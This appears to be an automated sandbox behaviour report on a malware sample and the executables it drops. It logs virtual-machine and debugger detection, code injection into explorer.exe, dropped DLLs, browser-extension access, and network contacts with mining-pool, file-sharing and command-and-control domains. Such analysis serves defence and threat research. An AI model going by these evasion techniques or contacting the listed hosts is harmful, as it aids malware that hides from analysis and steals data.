Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: U3E7zMaux2.exe, 00000001.00000002.713262263.00000000006A7000.00000004.00000020.sdmp, E666.exe, 00000013.00000002.784251113.000000000072B000.00000004.00000020.sdmp

Binary or memory string: ASWHOOK

Found evasive API chain (may stop execution after checking locale)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe

Code function: 20_2_00406AA0

20_2_00406AA0

Found evasive API chain (may stop execution after checking computer name)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe

Evasive API call chain: GetComputerName,DecisionNodes,Sleep

Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\SysWOW64\svchost.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Windows\explorer.exe TID: 7128	Thread sleep time: -31300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7116	Thread sleep time: -31300s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe TID: 2228	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5896	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 5532	Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 5532	Thread sleep time: -42000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\7801.exe TID: 5040	Thread sleep time: -120000s >= -30000s

Source: C:\Windows\SysWOW64\svchost.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_0-9944
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Users\user\AppData\Local\Temp\8EC4.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 605			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 408			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\D984.exe	API coverage: 0.3 %
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	API coverage: 6.9 %

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe

Code function: 20_2_00406AA0

20_2_00406AA0

Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CC60.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ACEF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BEB3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Evaded block: after key decision
Source: C:\Windows\SysWOW64\svchost.exe	Evaded block: after key decision

Source: C:\Windows\SysWOW64\svchost.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Windows\SysWOW64\svchost.exe

Code function: inet_addr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetBestInterface,GetProcessHeap,HeapAlloc,GetAdaptersInfo,HeapReAlloc,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,

39_2_0032199C

Source: C:\Users\user\AppData\Local\Temp\8EC4.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Source: explorer.exe, 00000007.00000000.706025644.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.679970478.000000000FD46000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA
Source: explorer.exe, 00000007.00000000.673323563.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.706025644.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001D.00000002.827857689.00000188ABAA6000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW@6
Source: explorer.exe, 00000007.00000000.693238319.000000000A83C000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}((
Source: WerFault.exe, 00000012.00000002.796335241.00000000010C0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.828113364.00000188ABAEB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000000.676806232.000000000A9AE000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA}
Source: explorer.exe, 00000007.00000000.672052714.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: svchost.exe, 0000001D.00000002.827601937.00000188ABA5B000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.825677547.00000188ABA5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWdisplaycatalog.mp.micros
Source: explorer.exe, 00000007.00000000.706560569.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000007.00000000.706825764.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Source: C:\Users\user\Desktop\U3E7zMaux2.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

Code function: 21_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,

21_2_00401D96

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	20_2_00405E40
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	20_2_004096E0
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	20_2_00401280
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	20_2_00401090
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	20_2_00409B40
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	20_2_00409970
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	20_2_004087E0

Source: C:\Users\user\Desktop\U3E7zMaux2.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Found API chain indicative of debugger detection

Show sources

Source: C:\Windows\SysWOW64\svchost.exe	Debugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Debugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Users\user\Desktop\U3E7zMaux2.exe

0_2_0040A3DE

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00520083 push dword ptr fs:[00000030h]	0_2_00520083
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00530042 push dword ptr fs:[00000030h]	0_2_00530042
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 17_2_00520083 push dword ptr fs:[00000030h]	17_2_00520083
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00401000 mov eax, dword ptr fs:[00000030h]	20_2_00401000
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_0040C180 mov eax, dword ptr fs:[00000030h]	20_2_0040C180
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00460083 push dword ptr fs:[00000030h]	20_2_00460083
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Code function: 36_2_00460083 push dword ptr fs:[00000030h]	36_2_00460083
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Code function: 36_2_0047092B mov eax, dword ptr fs:[00000030h]	36_2_0047092B
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Code function: 36_2_00470D90 mov eax, dword ptr fs:[00000030h]	36_2_00470D90
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Code function: 43_2_02EA0083 push dword ptr fs:[00000030h]	43_2_02EA0083
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Code function: 43_2_02F70D90 mov eax, dword ptr fs:[00000030h]	43_2_02F70D90
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Code function: 43_2_02F7092B mov eax, dword ptr fs:[00000030h]	43_2_02F7092B

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\U3E7zMaux2.exe

Code function: 0_2_00403C44 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00403C44

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe

Code function: 20_2_004048D0 VirtualProtect ?,00000004,00000100,00000000

20_2_004048D0

Source: C:\Users\user\Desktop\U3E7zMaux2.exe

Code function: 0_2_0040F0AE CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_0040F0AE

Source: C:\Users\user\AppData\Local\Temp\8EC4.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\uufaeea

Code function: 12_1_004027ED LdrLoadDll,

12_1_004027ED

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe

Memory protected: page guard

Jump to behavior

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00403C44 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00403C44
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00408848 SetUnhandledExceptionFilter,	0_2_00408848
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_0040383B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040383B
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00407A0C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00407A0C
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_0040976C
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Code function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,	21_2_00409A6B
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Code function: 36_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,	36_2_00409A6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 39_2_00329A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,	39_2_00329A6B

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: pool.supportxmr.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: patmushta.info
Source: C:\Windows\explorer.exe	Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe	Network Connect: 188.166.28.199 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 40.93.212.0 25
Source: C:\Windows\explorer.exe	Domain query: unicupload.top
Source: C:\Windows\explorer.exe	Network Connect: 185.233.81.115 187	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 8.209.67.104 443
Source: C:\Windows\explorer.exe	Network Connect: 185.7.214.171 144	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe	Domain query: privacy-tools-for-you-780.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\explorer.exe	Domain query: goo.su
Source: C:\Windows\explorer.exe	Domain query: transfer.sh
Source: C:\Windows\explorer.exe	Domain query: a0621298.xsph.ru
Source: C:\Windows\explorer.exe	Network Connect: 185.186.142.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: data-host-coin-8.com

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: 8ED5.exe.7.dr

Jump to dropped file

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
